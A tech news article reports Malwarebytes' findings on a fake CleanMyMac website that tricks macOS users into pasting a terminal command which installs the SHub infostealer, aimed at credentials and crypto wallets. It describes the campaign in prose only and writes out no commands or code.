'macOS is becoming a more attractive target, and the tools attackers use are becoming more capable and more professional': Experts warn 'convincing' fake CleanMyMac installs target Apple users to empty crypto wallets

News
By published

A fake website, a ClickFix, and an infostealer

IA y ciberseguridad
(Image credit: Forcepint)
  • Fake CleanMyMac utility spreads SHub infostealer
  • Attack tricks users into pasting terminal commands
  • Malware steals credentials, crypto, and persists via backdoor

A fake utility program for macOs is tricking users into installing an infostealer malware which exfiltrates passwords, sensitive files, and even money, experts have warned.

Security researchers Malwarebytes said the program was a part of a wider, highly sophisticated campaign which also included a custom website, reputable brand spoofing, a loader, and the good old ClickFix approach.

The researchers said the campaign spoofed CleanMyMac, a legitimate mac optimization program built by MacPaw, creating an almost identical website on the cleanmymacos[DOT]org domain, which makes it easy for people to mistake it for the real one. However, instead of simply downloading and running an installer, the victims are asked to open a terminal and paste a command that fetches the payload from a third-party server.

Article continues below

Stealing files and establishing persistence

“Instead of exploiting a vulnerability, it tricks the user into running the malware themselves,” Malwarebytes explained. “Because the command is executed voluntarily, protections such as Gatekeeper, notarization checks, and XProtect offer little protection once the user pastes the command and presses Return.”

The malware being installed this way is called SHub, and during installation, it will ask the victim for their macOS password. Since the entire installation process is somewhat unorthodox and could look like something a power user would do, users might dismiss it as standard practice, the researchers explained.

However, the password actually gives SHub access to the macOS Keychain, Wi-Fi credentials, app tokens, and other private keys.

“With the password in hand, SHub begins a systematic sweep of the machine,” the Malwarebytes researchers said.

After stealing passwords, cookies, autofill data, crypto wallet extensions, iCloud account data, Telegram session files, and other valuables, it drops a stage-two backdoor which replaces some cryptocurrency wallet apps with malicious copies. That way, the malware maintains persistence and even enables additional crypto theft down the line.

Finally, the crooks would install a LaunchAgent by spoofing a Google update service.

“In practice, this gives the attackers the ability to run commands on the infected Mac at any time until the persistence mechanism is discovered and removed,” the report concluded.

Best antivirus software header
The best antivirus for all budgets

➡️ Read our full guide to the best antivirus
1. Best overall:
Bitdefender Total Security
2. Best for families:
Norton 360 with LifeLock
3. Best for mobile:
McAfee Mobile Security

Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds. Make sure to click the Follow button!

And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form, and get regular updates from us on WhatsApp too.

Sead Fadilpašić

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

You must confirm your public display name before commenting

Please logout and then login again, you will then be prompted to enter your display name.